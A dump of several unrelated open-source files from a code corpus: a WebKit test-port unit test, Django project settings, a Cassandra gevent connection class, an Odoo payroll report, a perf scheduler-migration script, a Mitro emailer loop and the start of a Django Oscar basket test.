# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from webkitpy.common.system import filesystem_mock
from webkitpy.layout_tests.port.webkit import WebKitPort
from webkitpy.layout_tests.port import port_testcase
class TestWebKitPort(WebKitPort):
def __init__(self, symbol_list=None, feature_list=None,
expectations_file=None, skips_file=None, **kwargs):
self.symbol_list = symbol_list
self.feature_list = feature_list
self.expectations_file = expectations_file
self.skips_file = skips_file
WebKitPort.__init__(self, **kwargs)
def _runtime_feature_list(self):
return self.feature_list
def _supported_symbol_list(self):
return self.symbol_list
def _tests_for_other_platforms(self):
return ["media", ]
def _tests_for_disabled_features(self):
return ["accessibility", ]
def path_to_test_expectations_file(self):
if self.expectations_file:
return self.expectations_file
return WebKitPort.path_to_test_expectations_file(self)
def _skipped_file_paths(self):
if self.skips_file:
return [self.skips_file]
return []
class WebKitPortTest(port_testcase.PortTestCase):
def port_maker(self, platform):
return WebKitPort
def test_driver_cmd_line(self):
# Routine is not implemented.
pass
def test_baseline_search_path(self):
# Routine is not implemented.
pass
def test_skipped_directories_for_symbols(self):
supported_symbols = ["GraphicsLayer", "WebCoreHas3DRendering", "isXHTMLMPDocument", "fooSymbol"]
expected_directories = set(["mathml", "fast/canvas/webgl", "compositing/webgl", "http/tests/canvas/webgl", "http/tests/wml", "fast/wml", "wml", "fast/wcss"])
result_directories = set(TestWebKitPort(supported_symbols, None)._skipped_tests_for_unsupported_features())
self.assertEqual(result_directories, expected_directories)
def test_skipped_directories_for_features(self):
supported_features = ["Accelerated Compositing", "Foo Feature"]
expected_directories = set(["animations/3d", "transforms/3d"])
result_directories = set(TestWebKitPort(None, supported_features)._skipped_tests_for_unsupported_features())
self.assertEqual(result_directories, expected_directories)
def test_skipped_layout_tests(self):
self.assertEqual(TestWebKitPort(None, None).skipped_layout_tests(),
set(["media", "accessibility"]))
def test_test_expectations(self):
# Check that we read both the expectations file and anything in a
# Skipped file, and that we include the feature and platform checks.
files = {
'/tmp/test_expectations.txt': 'BUG_TESTEXPECTATIONS SKIP : fast/html/article-element.html = FAIL\n',
'/tmp/Skipped': 'fast/html/keygen.html',
}
mock_fs = filesystem_mock.MockFileSystem(files)
port = TestWebKitPort(expectations_file='/tmp/test_expectations.txt',
skips_file='/tmp/Skipped', filesystem=mock_fs)
self.assertEqual(port.test_expectations(),
"""BUG_TESTEXPECTATIONS SKIP : fast/html/article-element.html = FAIL
BUG_SKIPPED SKIP : fast/html/keygen.html = FAIL
BUG_SKIPPED SKIP : media = FAIL
BUG_SKIPPED SKIP : accessibility = FAIL""")
if __name__ == '__main__':
unittest.main()
| gpl-2.0 |
chaosk/trinitee | trinitee/settings_default.py | 1 | 5192 | # pylint: disable-all
"""
settings_default.py
Do NOT (!!!) edit this file!
Please override settings in settings_local.py instead.
"""
import os
import sys
from django.core.urlresolvers import reverse
from django.utils.functional import lazy
# Django settings for trinitee project.
PROJECT_DIR = os.path.dirname(__file__)
sys.path.insert(0, os.path.join(os.path.join(PROJECT_DIR, "lib"), "vendor"))
DEBUG = False
TEMPLATE_DEBUG = False
TEMPLATE_CACHING = True
INTERNAL_IPS = ('127.0.0.1',)
ADMINS = (
# ('John Doe', 'joe@doe.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
# Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3'.
'ENGINE': 'django.db.backends.sqlite3',
# Or path to database file if using sqlite3.
'NAME': PROJECT_DIR + '/trinitee.sqlite',
# Not used with sqlite3.
'USER': '',
# Not used with sqlite3.
'PASSWORD': '',
# Set to empty string for localhost. Not used with sqlite3.
'HOST': '',
# Set to empty string for default. Not used with sqlite3.
'PORT': '',
}
}
MAILER_ADDRESS = ''
WEBMASTER_EMAIL = ''
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(PROJECT_DIR, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory that holds static files.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(MEDIA_ROOT, 'static')
# URL that handles the static files served from STATIC_ROOT.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/media/static/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/static/admin/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'foobar'
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# User profile model
AUTH_PROFILE_MODULE = 'core.UserProfile'
ANONYMOUS_USER_ID = -1
# Message storage backend
MESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage'
LOGIN_REDIRECT_URL = '/accounts/%(username)s/'
LOGIN_URL = '/accounts/signin/'
LOGOUT_URL = '/accounts/signout/'
reverse_lazy = lazy(reverse, str)
ABSOLUTE_URL_OVERRIDES = {
# 'auth.user': lambda u: reverse_lazy('profile', kwargs={'user_id': u.id}),
}
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
if TEMPLATE_CACHING:
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', TEMPLATE_LOADERS),
)
SESSION_ENGINE = 'django.contrib.sessions.backends.file'
AUTHENTICATION_BACKENDS = (
'userena.backends.UserenaAuthenticationBackend',
'guardian.backends.ObjectPermissionBackend',
'django.contrib.auth.backends.ModelBackend',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.middleware.http.ConditionalGetMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.transaction.TransactionMiddleware',
'reversion.middleware.RevisionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'wiki.middleware.WikiWhitespaceMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.static',
'django.core.context_processors.media',
'django.core.context_processors.request',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
os.path.join(PROJECT_DIR, 'templates'),
)
PROJECT_APPS = (
'core',
'lib',
# 'accounts',
'forums',
'wiki',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'guardian',
'reversion',
'south',
'easy_thumbnails',
'userena',
'userena.contrib.umessages',
) + PROJECT_APPS
PYLINT_RCFILE = os.path.join(os.path.dirname(PROJECT_DIR), '.pylintrc') | bsd-3-clause |
HackerEarth/cassandra-python-driver | cassandra/io/geventreactor.py | 1 | 6547 | # Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gevent
from gevent import select, socket, ssl
from gevent.event import Event
from gevent.queue import Queue
from collections import defaultdict
from functools import partial
import logging
import os
from six.moves import xrange
from errno import EALREADY, EINPROGRESS, EWOULDBLOCK, EINVAL
from cassandra import OperationTimedOut
from cassandra.connection import Connection, ConnectionShutdown
from cassandra.protocol import RegisterMessage
log = logging.getLogger(__name__)
def is_timeout(err):
return (
err in (EINPROGRESS, EALREADY, EWOULDBLOCK) or
(err == EINVAL and os.name in ('nt', 'ce'))
)
class GeventConnection(Connection):
"""
An implementation of :class:`.Connection` that utilizes ``gevent``.
"""
_total_reqd_bytes = 0
_read_watcher = None
_write_watcher = None
_socket = None
@classmethod
def factory(cls, *args, **kwargs):
timeout = kwargs.pop('timeout', 5.0)
conn = cls(*args, **kwargs)
conn.connected_event.wait(timeout)
if conn.last_error:
raise conn.last_error
elif not conn.connected_event.is_set():
conn.close()
raise OperationTimedOut("Timed out creating connection")
else:
return conn
def __init__(self, *args, **kwargs):
Connection.__init__(self, *args, **kwargs)
self.connected_event = Event()
self._write_queue = Queue()
self._callbacks = {}
self._push_watchers = defaultdict(set)
sockerr = None
addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
for (af, socktype, proto, canonname, sockaddr) in addresses:
try:
self._socket = socket.socket(af, socktype, proto)
if self.ssl_options:
self._socket = ssl.wrap_socket(self._socket, **self.ssl_options)
self._socket.settimeout(1.0)
self._socket.connect(sockaddr)
sockerr = None
break
except socket.error as err:
sockerr = err
if sockerr:
raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror))
if self.sockopts:
for args in self.sockopts:
self._socket.setsockopt(*args)
self._read_watcher = gevent.spawn(self.handle_read)
self._write_watcher = gevent.spawn(self.handle_write)
self._send_options_message()
def close(self):
with self.lock:
if self.is_closed:
return
self.is_closed = True
log.debug("Closing connection (%s) to %s" % (id(self), self.host))
if self._read_watcher:
self._read_watcher.kill(block=False)
if self._write_watcher:
self._write_watcher.kill(block=False)
if self._socket:
self._socket.close()
log.debug("Closed socket to %s" % (self.host,))
if not self.is_defunct:
self.error_all_callbacks(
ConnectionShutdown("Connection to %s was closed" % self.host))
# don't leave in-progress operations hanging
self.connected_event.set()
def handle_close(self):
log.debug("connection closed by server")
self.close()
def handle_write(self):
run_select = partial(select.select, (), (self._socket,), ())
while True:
try:
next_msg = self._write_queue.get()
run_select()
except Exception as exc:
if not self.is_closed:
log.debug("Exception during write select() for %s: %s", self, exc)
self.defunct(exc)
return
try:
self._socket.sendall(next_msg)
except socket.error as err:
log.debug("Exception during socket sendall for %s: %s", self, err)
self.defunct(err)
return # Leave the write loop
def handle_read(self):
run_select = partial(select.select, (self._socket,), (), ())
while True:
try:
run_select()
except Exception as exc:
if not self.is_closed:
log.debug("Exception during read select() for %s: %s", self, exc)
self.defunct(exc)
return
try:
while True:
buf = self._socket.recv(self.in_buffer_size)
self._iobuf.write(buf)
if len(buf) < self.in_buffer_size:
break
except socket.error as err:
if not is_timeout(err):
log.debug("Exception during socket recv for %s: %s", self, err)
self.defunct(err)
return # leave the read loop
if self._iobuf.tell():
self.process_io_buffer()
else:
log.debug("Connection %s closed by server", self)
self.close()
return
def push(self, data):
chunk_size = self.out_buffer_size
for i in xrange(0, len(data), chunk_size):
self._write_queue.put(data[i:i + chunk_size])
def register_watcher(self, event_type, callback, register_timeout=None):
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=[event_type]),
timeout=register_timeout)
def register_watchers(self, type_callback_dict, register_timeout=None):
for event_type, callback in type_callback_dict.items():
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=type_callback_dict.keys()),
timeout=register_timeout)
| apache-2.0 |
Endika/odoo | addons/l10n_in_hr_payroll/report/report_hr_yearly_salary_detail.py | 374 | 6855 | #-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 OpenERP SA (<http://openerp.com>). All Rights Reserved
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import datetime
from openerp.report import report_sxw
from openerp.osv import osv
class employees_yearly_salary_report(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(employees_yearly_salary_report, self).__init__(cr, uid, name, context)
self.localcontext.update({
'time': time,
'get_employee': self.get_employee,
'get_employee_detail': self.get_employee_detail,
'cal_monthly_amt': self.cal_monthly_amt,
'get_periods': self.get_periods,
'get_total': self.get_total,
'get_allow': self.get_allow,
'get_deduct': self.get_deduct,
})
self.context = context
def get_periods(self, form):
self.mnths = []
# Get start year-month-date and end year-month-date
first_year = int(form['date_from'][0:4])
last_year = int(form['date_to'][0:4])
first_month = int(form['date_from'][5:7])
last_month = int(form['date_to'][5:7])
no_months = (last_year-first_year) * 12 + last_month - first_month + 1
current_month = first_month
current_year = first_year
# Get name of the months from integer
mnth_name = []
for count in range(0, no_months):
m = datetime.date(current_year, current_month, 1).strftime('%b')
mnth_name.append(m)
self.mnths.append(str(current_month) + '-' + str(current_year))
if current_month == 12:
current_month = 0
current_year = last_year
current_month = current_month + 1
for c in range(0, (12-no_months)):
mnth_name.append('')
self.mnths.append('')
return [mnth_name]
def get_employee(self, form):
return self.pool.get('hr.employee').browse(self.cr,self.uid, form.get('employee_ids', []), context=self.context)
def get_employee_detail(self, form, obj):
self.allow_list = []
self.deduct_list = []
self.total = 0.00
gross = False
net = False
payslip_lines = self.cal_monthly_amt(form, obj.id)
for line in payslip_lines:
for line[0] in line:
if line[0][0] == "Gross":
gross = line[0]
elif line[0][0] == "Net":
net = line[0]
elif line[0][13] > 0.0 and line[0][0] != "Net":
self.total += line[0][len(line[0])-1]
self.allow_list.append(line[0])
elif line[0][13] < 0.0:
self.total += line[0][len(line[0])-1]
self.deduct_list.append(line[0])
if gross:
self.allow_list.append(gross)
if net:
self.deduct_list.append(net)
return None
def cal_monthly_amt(self, form, emp_id):
category_obj = self.pool.get('hr.salary.rule.category')
result = []
res = []
salaries = {}
self.cr.execute('''SELECT rc.code, pl.name, sum(pl.total), \
to_char(date_to,'mm-yyyy') as to_date FROM hr_payslip_line as pl \
LEFT JOIN hr_salary_rule_category AS rc on (pl.category_id = rc.id) \
LEFT JOIN hr_payslip as p on pl.slip_id = p.id \
LEFT JOIN hr_employee as emp on emp.id = p.employee_id \
WHERE p.employee_id = %s \
GROUP BY rc.parent_id, pl.sequence, pl.id, pl.category_id,pl.name,p.date_to,rc.code \
ORDER BY pl.sequence, rc.parent_id''',(emp_id,))
salary = self.cr.fetchall()
for category in salary:
if category[0] not in salaries:
salaries.setdefault(category[0], {})
salaries[category[0]].update({category[1]: {category[3]: category[2]}})
elif category[1] not in salaries[category[0]]:
salaries[category[0]].setdefault(category[1], {})
salaries[category[0]][category[1]].update({category[3]: category[2]})
else:
salaries[category[0]][category[1]].update({category[3]: category[2]})
category_ids = category_obj.search(self.cr,self.uid, [], context=self.context)
categories = category_obj.read(self.cr, self.uid, category_ids, ['code'], context=self.context)
for code in map(lambda x: x['code'], categories):
if code in salaries:
res = self.salary_list(salaries[code])
result.append(res)
return result
def salary_list(self, salaries):
cat_salary_all = []
for category_name,amount in salaries.items():
cat_salary = []
total = 0.0
cat_salary.append(category_name)
for mnth in self.mnths:
if mnth <> 'None':
if len(mnth) != 7:
mnth = '0' + str(mnth)
if mnth in amount and amount[mnth]:
cat_salary.append(amount[mnth])
total += amount[mnth]
else:
cat_salary.append(0.00)
else:
cat_salary.append('')
cat_salary.append(total)
cat_salary_all.append(cat_salary)
return cat_salary_all
def get_allow(self):
return self.allow_list
def get_deduct(self):
return self.deduct_list
def get_total(self):
return self.total
class wrapped_report_payslip(osv.AbstractModel):
_name = 'report.l10n_in_hr_payroll.report_hryearlysalary'
_inherit = 'report.abstract_report'
_template = 'l10n_in_hr_payroll.report_hryearlysalary'
_wrapped_report_class = employees_yearly_salary_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | agpl-3.0 |
bestmjh47/ActiveKernel_EF33S | tools/perf/scripts/python/sched-migration.py | 11215 | 11670 | #!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <fweisbec@gmail.com>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
threads = { 0 : "idle"}
def thread_name(pid):
return "%s:%d" % (threads[pid], pid)
class RunqueueEventUnknown:
@staticmethod
def color():
return None
def __repr__(self):
return "unknown"
class RunqueueEventSleep:
@staticmethod
def color():
return (0, 0, 0xff)
def __init__(self, sleeper):
self.sleeper = sleeper
def __repr__(self):
return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
@staticmethod
def color():
return (0xff, 0xff, 0)
def __init__(self, wakee):
self.wakee = wakee
def __repr__(self):
return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
@staticmethod
def color():
return (0, 0xff, 0)
def __init__(self, child):
self.child = child
def __repr__(self):
return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
@staticmethod
def color():
return (0, 0xf0, 0xff)
def __init__(self, new):
self.new = new
def __repr__(self):
return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
@staticmethod
def color():
return (0xff, 0, 0xff)
def __init__(self, old):
self.old = old
def __repr__(self):
return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
self.tasks = tuple(tasks)
self.event = event
def sched_switch(self, prev, prev_state, next):
event = RunqueueEventUnknown()
if taskState(prev_state) == "R" and next in self.tasks \
and prev in self.tasks:
return self
if taskState(prev_state) != "R":
event = RunqueueEventSleep(prev)
next_tasks = list(self.tasks[:])
if prev in self.tasks:
if taskState(prev_state) != "R":
next_tasks.remove(prev)
elif taskState(prev_state) == "R":
next_tasks.append(prev)
if next not in next_tasks:
next_tasks.append(next)
return RunqueueSnapshot(next_tasks, event)
def migrate_out(self, old):
if old not in self.tasks:
return self
next_tasks = [task for task in self.tasks if task != old]
return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
def __migrate_in(self, new, event):
if new in self.tasks:
self.event = event
return self
next_tasks = self.tasks[:] + tuple([new])
return RunqueueSnapshot(next_tasks, event)
def migrate_in(self, new):
return self.__migrate_in(new, RunqueueMigrateIn(new))
def wake_up(self, new):
return self.__migrate_in(new, RunqueueEventWakeup(new))
def wake_up_new(self, new):
return self.__migrate_in(new, RunqueueEventFork(new))
def load(self):
""" Provide the number of tasks on the runqueue.
Don't count idle"""
return len(self.tasks) - 1
def __repr__(self):
ret = self.tasks.__repr__()
ret += self.origin_tostring()
return ret
class TimeSlice:
def __init__(self, start, prev):
self.start = start
self.prev = prev
self.end = start
# cpus that triggered the event
self.event_cpus = []
if prev is not None:
self.total_load = prev.total_load
self.rqs = prev.rqs.copy()
else:
self.rqs = defaultdict(RunqueueSnapshot)
self.total_load = 0
def __update_total_load(self, old_rq, new_rq):
diff = new_rq.load() - old_rq.load()
self.total_load += diff
def sched_switch(self, ts_list, prev, prev_state, next, cpu):
old_rq = self.prev.rqs[cpu]
new_rq = old_rq.sched_switch(prev, prev_state, next)
if old_rq is new_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def migrate(self, ts_list, new, old_cpu, new_cpu):
if old_cpu == new_cpu:
return
old_rq = self.prev.rqs[old_cpu]
out_rq = old_rq.migrate_out(new)
self.rqs[old_cpu] = out_rq
self.__update_total_load(old_rq, out_rq)
new_rq = self.prev.rqs[new_cpu]
in_rq = new_rq.migrate_in(new)
self.rqs[new_cpu] = in_rq
self.__update_total_load(new_rq, in_rq)
ts_list.append(self)
if old_rq is not out_rq:
self.event_cpus.append(old_cpu)
self.event_cpus.append(new_cpu)
def wake_up(self, ts_list, pid, cpu, fork):
old_rq = self.prev.rqs[cpu]
if fork:
new_rq = old_rq.wake_up_new(pid)
else:
new_rq = old_rq.wake_up(pid)
if new_rq is old_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def next(self, t):
self.end = t
return TimeSlice(t, self)
class TimeSliceList(UserList):
def __init__(self, arg = []):
self.data = arg
def get_time_slice(self, ts):
if len(self.data) == 0:
slice = TimeSlice(ts, TimeSlice(-1, None))
else:
slice = self.data[-1].next(ts)
return slice
def find_time_slice(self, ts):
start = 0
end = len(self.data)
found = -1
searching = True
while searching:
if start == end or start == end - 1:
searching = False
i = (end + start) / 2
if self.data[i].start <= ts and self.data[i].end >= ts:
found = i
end = i
continue
if self.data[i].end < ts:
start = i
elif self.data[i].start > ts:
end = i
return found
def set_root_win(self, win):
self.root_win = win
def mouse_down(self, cpu, t):
idx = self.find_time_slice(t)
if idx == -1:
return
ts = self[idx]
rq = ts.rqs[cpu]
raw = "CPU: %d\n" % cpu
raw += "Last event : %s\n" % rq.event.__repr__()
raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
raw += "Load = %d\n" % rq.load()
for t in rq.tasks:
raw += "%s \n" % thread_name(t)
self.root_win.update_summary(raw)
def update_rectangle_cpu(self, slice, cpu):
rq = slice.rqs[cpu]
if slice.total_load != 0:
load_rate = rq.load() / float(slice.total_load)
else:
load_rate = 0
red_power = int(0xff - (0xff * load_rate))
color = (0xff, red_power, red_power)
top_color = None
if cpu in slice.event_cpus:
top_color = rq.event.color()
self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
def fill_zone(self, start, end):
i = self.find_time_slice(start)
if i == -1:
return
for i in xrange(i, len(self.data)):
timeslice = self.data[i]
if timeslice.start > end:
return
for cpu in timeslice.rqs:
self.update_rectangle_cpu(timeslice, cpu)
def interval(self):
if len(self.data) == 0:
return (0, 0)
return (self.data[0].start, self.data[-1].end)
def nr_rectangles(self):
last_ts = self.data[-1]
max_cpu = 0
for cpu in last_ts.rqs:
if cpu > max_cpu:
max_cpu = cpu
return max_cpu
class SchedEventProxy:
def __init__(self):
self.current_tsk = defaultdict(lambda : -1)
self.timeslices = TimeSliceList()
def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
""" Ensure the task we sched out this cpu is really the one
we logged. Otherwise we may have missed traces """
on_cpu_task = self.current_tsk[headers.cpu]
if on_cpu_task != -1 and on_cpu_task != prev_pid:
print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
(headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)
threads[prev_pid] = prev_comm
threads[next_pid] = next_comm
self.current_tsk[headers.cpu] = next_pid
ts = self.timeslices.get_time_slice(headers.ts())
ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)
def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
ts = self.timeslices.get_time_slice(headers.ts())
ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)
def wake_up(self, headers, comm, pid, success, target_cpu, fork):
if success == 0:
return
ts = self.timeslices.get_time_slice(headers.ts())
ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
global parser
parser = SchedEventProxy()
def trace_end():
app = wx.App(False)
timeslices = parser.timeslices
frame = RootFrame(timeslices, "Migration")
app.MainLoop()
def sched__sched_stat_runtime(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, runtime, vruntime):
pass
def sched__sched_stat_iowait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_sleep(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_process_fork(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
parent_comm, parent_pid, child_comm, child_pid):
pass
def sched__sched_process_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_free(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_migrate_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, orig_cpu,
dest_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 0)
def sched__sched_wait_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
ret):
pass
def sched__sched_kthread_stop(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid):
pass
def trace_unhandled(event_name, context, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
pass
| gpl-2.0 |
ahmedalsudani/mitro | emailer/emailer2.py | 24 | 2339 | #!/usr/bin/env python
'''Emailer2: Send users emails
Uses Amazon SES to send emails.
To create a new template:
1. Write the HTML for the template into templates/templatename_html.html
2. Convert to email using http://premailer.dialect.ca/ . Save as templates/templatename.html
WARNING: Premailer will escape templates ({{}}) in links; manually fix these
3. Save a plain text version as templates/templatename.txt
4. Add type string to email_queue.py as _TYPE_(NAME), add to _VALID_TYPES
5. Add a new else if to _loop_once
6. Write the function to send the email (copy the existing examples?)
'''
import datetime
import json
import logging
import sqlalchemy
import sqlalchemy.exc
import sqlalchemy.ext.declarative
import sqlalchemy.orm
from sqlalchemy.pool import StaticPool
from sqlalchemy.pool import NullPool
import tornado.options
from auth import email_queue
from auth import models2
from auth import statsd
Session = sqlalchemy.orm.sessionmaker()
_once = False
def connect_to_database(url):
global _once
assert not _once
_once = True
engine = sqlalchemy.create_engine(url, poolclass=sqlalchemy.pool.NullPool, echo=False)
Session.configure(bind=engine)
def main():
logging.root.setLevel(logging.INFO)
connect_to_database('postgres:///mitro')
extra_args = tornado.options.parse_command_line()
# Verify that mandrill is configured
if tornado.options.options.enable_email:
assert len(tornado.options.options.mandrill_api_key) > 0
# Datadog listens for statsd requests on port 8125
statsd_client = statsd.StatsdClient('localhost', 8125, 'emailer')
backoff_sleeper = email_queue.BackoffSleeper()
email_queue_type = models2.EmailQueue
while True:
try:
email_queue.poll_forever(Session, email_queue_type, statsd_client)
except sqlalchemy.exc.OperationalError, e:
# In case Postgres is not running, retry the connection a few times before dying.
# This is long enough to get upstart to keep restarting the emailer
if not backoff_sleeper.shouldRetryAfterSleep():
logging.error('Failing after %d retries', backoff_sleeper.max_retries())
raise
logging.error('SQLAlchemy exception; retrying after timeout')
if __name__ == '__main__':
main()
| gpl-3.0 |
dongguangming/django-oscar | tests/integration/basket/model_tests.py | 35 | 4877 | from decimal import Decimal as D
from django.test import TestCase
from oscar.apps.basket.models import Basket
from oscar.apps.partner import strategy
from oscar.test import factories
from oscar.apps.catalogue.models import Option
class TestAddingAProductToABasket(TestCase):
def setUp(self):
self.basket = Basket()
self.basket.strategy = strategy.Default()
self.product = factories.create_product()
self.record = factories.create_stockrecord(
currency='GBP',
product=self.product, price_excl_tax=D('10.00'))
self.purchase_info = factories.create_purchase_info(self.record)
self.basket.add(self.product)
def test_creates_a_line(self):
self.assertEqual(1, self.basket.num_lines)
